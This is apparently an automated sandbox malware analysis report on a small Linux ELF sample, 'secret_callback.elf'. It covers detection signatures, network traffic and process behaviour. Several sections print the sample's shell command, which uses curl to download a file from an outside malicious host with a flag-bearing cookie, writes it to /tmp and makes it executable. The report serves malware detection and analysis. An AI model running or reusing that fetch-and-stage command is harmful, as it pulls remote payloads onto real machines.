Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
secret_callback.elf

Overview

General Information

Sample name:secret_callback.elf
Analysis ID:1686590
Has dependencies:false
MD5:c4e59526ee249153efb3fe9f9afc0933
SHA1:2392aeac2a203ce1c94124bb9a61e67e82a35f2c
SHA256:dc8721efdf3cc1e6a275eea7d717930289eff30c49dba8ffd47711fb8d85fa2e
Tags:elfuser-hadi
Infos:

Detection

Shikitega
Score:56
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Shikitega
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Reads the 'hosts' file potentially containing internal network hosts
Sample contains only a LOAD segment without any section mappings
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1686590
Start date and time:2025-05-10 08:13:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 44s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:secret_callback.elf
Detection:MAL
Classification:mal56.troj.linELF@0/1@2/0
  • VT rate limit hit for: http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu
Command:/tmp/secret_callback.elf
PID:6243
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • secret_callback.elf (PID: 6243, Parent: 6165, MD5: c4e59526ee249153efb3fe9f9afc0933) Arguments: /tmp/secret_callback.elf
  • sh (PID: 6243, Parent: 6165, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh"
    • sh New Fork (PID: 6244, Parent: 6243)
    • curl (PID: 6244, Parent: 6243, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh
  • cleanup
SourceRuleDescriptionAuthorStrings
secret_callback.elfJoeSecurity_ShikitegaYara detected ShikitegaJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: secret_callback.elfVirustotal: Detection: 21%Perma Link
    Source: secret_callback.elfReversingLabs: Detection: 25%
    Source: /usr/bin/curl (PID: 6244)Reads hosts file: /etc/hostsJump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu HTTP/1.1Host: conn.masjesu.zipUser-Agent: curl/7.68.0Accept: */*Cookie: result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D
    Source: global trafficDNS traffic detected: DNS query: conn.masjesu.zip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 10 May 2025 06:16:08 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: LOAD without section mappingsProgram segment: 0x8048000
    Source: classification engineClassification label: mal56.troj.linELF@0/1@2/0
    Source: /usr/bin/curl (PID: 6244)Directory: /root/.curlrcJump to behavior
    Source: /tmp/secret_callback.elf (PID: 6243)Shell command executed: /bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh"Jump to behavior
    Source: /bin/sh (PID: 6244)Curl executable: /usr/bin/curl -> curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.shJump to behavior
    Source: /usr/bin/curl (PID: 6244)Queries kernel information via 'uname': Jump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: secret_callback.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: secret_callback.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path Interception1
    Hidden Files and Directories
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    1
    Exfiltration Over Alternative Protocol
    Abuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    secret_callback.elf22%VirustotalBrowse
    secret_callback.elf26%ReversingLabsLinux.Trojan.Multiverze
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    conn.masjesu.zip
    163.5.159.12
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayufalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      94.26.90.14
      unknownBulgaria61317ASDETUKhttpwwwheficedcomGBfalse
      163.5.159.12
      conn.masjesu.zipFrance56339EPITECHFRfalse
      109.202.202.202
      unknownSwitzerland13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      109.202.202.202na.elfGet hashmaliciousPrometeiBrowse
        armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
          armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
            na.elfGet hashmaliciousPrometeiBrowse
              na.elfGet hashmaliciousPrometeiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      m68k.elfGet hashmaliciousGafgytBrowse
                        sh4.elfGet hashmaliciousGafgytBrowse
                          91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                            armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                              armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          m68k.elfGet hashmaliciousGafgytBrowse
                                            sh4.elfGet hashmaliciousGafgytBrowse
                                              91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              m68k.elfGet hashmaliciousGafgytBrowse
                                                                sh4.elfGet hashmaliciousGafgytBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  conn.masjesu.zipLkUJU0rsxdoNTRjxlZ5e0rZRO3rOY4rKRo.elfGet hashmaliciousMiraiBrowse
                                                                  • 216.126.231.240
                                                                  Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfGet hashmaliciousMiraiBrowse
                                                                  • 87.120.84.230
                                                                  xqnE9OFV4c95En0D7MDN4V1MMPIWrAHvms.elfGet hashmaliciousUnknownBrowse
                                                                  • 37.221.64.245
                                                                  iUeQQNFZ9vwOLXIBiZ4156FCf1nexMVYnW.elfGet hashmaliciousUnknownBrowse
                                                                  • 37.44.238.75
                                                                  9oHxcmR9GQ.elfGet hashmaliciousUnknownBrowse
                                                                  • 37.44.238.67
                                                                  FGMFTsT81P.elfGet hashmaliciousUnknownBrowse
                                                                  • 95.214.27.138
                                                                  yzBWO9nYig.elfGet hashmaliciousUnknownBrowse
                                                                  • 37.44.238.67
                                                                  DEDE73vYjt.elfGet hashmaliciousUnknownBrowse
                                                                  • 95.214.27.134
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  m68k.elfGet hashmaliciousGafgytBrowse
                                                                  • 91.189.91.42
                                                                  sh4.elfGet hashmaliciousGafgytBrowse
                                                                  • 91.189.91.42
                                                                  EPITECHFRhttps://files.fm/f/wpd3hsuh55?share_email_id=15c922d&share_email_skip_notify=trueGet hashmaliciousUnknownBrowse
                                                                  • 163.5.194.36
                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 163.5.63.254
                                                                  https://solanadefimainnet.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 163.5.194.36
                                                                  http://login-ourtime.members-datings.workers.dev/v3/aboutonlinedatingGet hashmaliciousHTMLPhisherBrowse
                                                                  • 163.5.194.34
                                                                  https://sucursal-virtual123.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                  • 163.5.194.37
                                                                  400000.RegSvcs.exeGet hashmaliciousXWormBrowse
                                                                  • 163.5.64.209
                                                                  conhost.exeGet hashmaliciousUnknownBrowse
                                                                  • 163.5.121.253
                                                                  CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  m68k.elfGet hashmaliciousGafgytBrowse
                                                                  • 91.189.91.42
                                                                  sh4.elfGet hashmaliciousGafgytBrowse
                                                                  • 91.189.91.42
                                                                  ASDETUKhttpwwwheficedcomGBShotstar.batGet hashmaliciousRemcosBrowse
                                                                  • 196.251.66.111
                                                                  rZG87j3PBj.exeGet hashmaliciousPureLog Stealer, RevengeRATBrowse
                                                                  • 196.251.66.118
                                                                  WinUpdater.exeGet hashmaliciousBlackNETBrowse
                                                                  • 94.26.90.79
                                                                  ez2winnontls.exeGet hashmaliciousXmrigBrowse
                                                                  • 94.26.90.79
                                                                  ez2wintls.exeGet hashmaliciousXmrigBrowse
                                                                  • 94.26.90.79
                                                                  tsuki.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 191.104.169.33
                                                                  VisualCode.exeGet hashmaliciousAsyncRAT, LummaC Stealer, Njrat, Quasar, Vidar, XWormBrowse
                                                                  • 94.26.90.81
                                                                  250427-ryd2tassex.bin.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                  • 94.26.90.80
                                                                  jklm68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 191.108.164.173
                                                                  splarm.elfGet hashmaliciousUnknownBrowse
                                                                  • 191.104.159.0
                                                                  INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 109.202.202.202
                                                                  m68k.elfGet hashmaliciousGafgytBrowse
                                                                  • 109.202.202.202
                                                                  sh4.elfGet hashmaliciousGafgytBrowse
                                                                  • 109.202.202.202
                                                                  No context
                                                                  No context
                                                                  Process:/usr/bin/curl
                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):153
                                                                  Entropy (8bit):4.528078370574827
                                                                  Encrypted:false
                                                                  SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPpuwcWWGu:q43tIkObRHXiMIWObtklI5LPpupfGu
                                                                  MD5:998368D7C95EA4293237F2320546E440
                                                                  SHA1:30DFD2D3BB8A7E3241BD7792E90A98EBB70BE3A4
                                                                  SHA-256:533A1CA5D6595793725BCA7641D9461A0F00DD1732DDED3E4281196F5DD21736
                                                                  SHA-512:648C4720A85DBF834BE1BA00F0E1B4167CC670FE15896EFB00A77FB6E0C225A13AAE3DA10D85FA6E7F726420D9BB3C20C43466E02296D44153C127B7160E0B97
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.22.1</center>..</body>..</html>..
                                                                  File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header
                                                                  Entropy (8bit):6.57720793169131
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:secret_callback.elf
                                                                  File size:314 bytes
                                                                  MD5:c4e59526ee249153efb3fe9f9afc0933
                                                                  SHA1:2392aeac2a203ce1c94124bb9a61e67e82a35f2c
                                                                  SHA256:dc8721efdf3cc1e6a275eea7d717930289eff30c49dba8ffd47711fb8d85fa2e
                                                                  SHA512:37fde58c6247cb4bef5f6956b42dfc2679a44f0a18d5743725a75a4aa335379205757490706b5f6ef8c3b626fcfe00ab6b4d33c1f21e21e4762c3ffcd4b1bb21
                                                                  SSDEEP:6:Btk/tMl//EEldoH4ABeW14HwONUq2J4ordMoL3AGGD0REBhddwY1LAganDXqv6BL:BnlXEElbABeAK9Gq2JxrGoKBhdqYLAfD
                                                                  TLSH:23E0E700414CC64FE1455D7F3000275F33814274FE713547503043544B4D80C1D115C7
                                                                  File Content Preview:.ELF....................T...4...........4. .........................:... ............A.{....t$.]3..31U.....U....p....9..d^.$..dS.k.......O..(%m....F..p..HW....t.ef.+.......L*.".....N..@...?....bRm.&..6....c&.a...L.=..ZN.l..<.x...8..B..JPU[^........uN.?>w%

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:Intel 80386
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x8048054
                                                                  Flags:0x0
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:1
                                                                  Section Header Offset:0
                                                                  Section Header Size:0
                                                                  Number of Section Headers:0
                                                                  Header String Table Index:0
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x80480000x80480000x13a0x2206.57720x7RWE0x1000
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 10, 2025 08:13:57.228791952 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:13:58.253626108 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:13:58.861725092 CEST42836443192.168.2.2391.189.91.43
                                                                  May 10, 2025 08:13:59.629465103 CEST4251680192.168.2.23109.202.202.202
                                                                  May 10, 2025 08:14:00.269377947 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:14:04.492909908 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:14:12.683804035 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:14:14.987476110 CEST43928443192.168.2.2391.189.91.42
                                                                  May 10, 2025 08:14:25.226001978 CEST42836443192.168.2.2391.189.91.43
                                                                  May 10, 2025 08:14:28.809494972 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:14:29.321645975 CEST4251680192.168.2.23109.202.202.202
                                                                  May 10, 2025 08:14:55.941847086 CEST43928443192.168.2.2391.189.91.42
                                                                  May 10, 2025 08:15:02.084985971 CEST5996880192.168.2.23163.5.159.12
                                                                  May 10, 2025 08:16:07.614203930 CEST3551880192.168.2.2394.26.90.14
                                                                  May 10, 2025 08:16:07.943572044 CEST803551894.26.90.14192.168.2.23
                                                                  May 10, 2025 08:16:07.943926096 CEST3551880192.168.2.2394.26.90.14
                                                                  May 10, 2025 08:16:07.944103003 CEST3551880192.168.2.2394.26.90.14
                                                                  May 10, 2025 08:16:08.273507118 CEST803551894.26.90.14192.168.2.23
                                                                  May 10, 2025 08:16:08.273822069 CEST803551894.26.90.14192.168.2.23
                                                                  May 10, 2025 08:16:08.274183989 CEST3551880192.168.2.2394.26.90.14
                                                                  May 10, 2025 08:16:08.280874968 CEST3551880192.168.2.2394.26.90.14
                                                                  May 10, 2025 08:16:08.611159086 CEST803551894.26.90.14192.168.2.23
                                                                  May 10, 2025 08:16:08.611552954 CEST3551880192.168.2.2394.26.90.14
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 10, 2025 08:13:56.900296926 CEST4020053192.168.2.231.1.1.1
                                                                  May 10, 2025 08:13:56.900453091 CEST5215253192.168.2.231.1.1.1
                                                                  May 10, 2025 08:13:57.219717026 CEST53402001.1.1.1192.168.2.23
                                                                  May 10, 2025 08:13:57.219779968 CEST53521521.1.1.1192.168.2.23
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  May 10, 2025 08:13:56.900296926 CEST192.168.2.231.1.1.10x57e6Standard query (0)conn.masjesu.zipA (IP address)IN (0x0001)false
                                                                  May 10, 2025 08:13:56.900453091 CEST192.168.2.231.1.1.10x8dcaStandard query (0)conn.masjesu.zip28IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  May 10, 2025 08:13:57.219717026 CEST1.1.1.1192.168.2.230x57e6No error (0)conn.masjesu.zip163.5.159.12A (IP address)IN (0x0001)false
                                                                  May 10, 2025 08:13:57.219717026 CEST1.1.1.1192.168.2.230x57e6No error (0)conn.masjesu.zip94.26.90.14A (IP address)IN (0x0001)false
                                                                  • conn.masjesu.zip
                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.233551894.26.90.1480
                                                                  TimestampBytes transferredDirectionData
                                                                  May 10, 2025 08:16:07.944103003 CEST178OUTGET /bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu HTTP/1.1
                                                                  Host: conn.masjesu.zip
                                                                  User-Agent: curl/7.68.0
                                                                  Accept: */*
                                                                  Cookie: result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D
                                                                  May 10, 2025 08:16:08.273822069 CEST329INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sat, 10 May 2025 06:16:08 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 153
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                  System Behavior

                                                                  Start time (UTC):06:13:55
                                                                  Start date (UTC):10/05/2025
                                                                  Path:/tmp/secret_callback.elf
                                                                  Arguments:/tmp/secret_callback.elf
                                                                  File size:314 bytes
                                                                  MD5 hash:c4e59526ee249153efb3fe9f9afc0933

                                                                  Start time (UTC):06:13:55
                                                                  Start date (UTC):10/05/2025
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):06:13:55
                                                                  Start date (UTC):10/05/2025
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):06:13:55
                                                                  Start date (UTC):10/05/2025
                                                                  Path:/usr/bin/curl
                                                                  Arguments:curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh
                                                                  File size:239848 bytes
                                                                  MD5 hash:add6bc2195e82c55985ccf49fd4048e6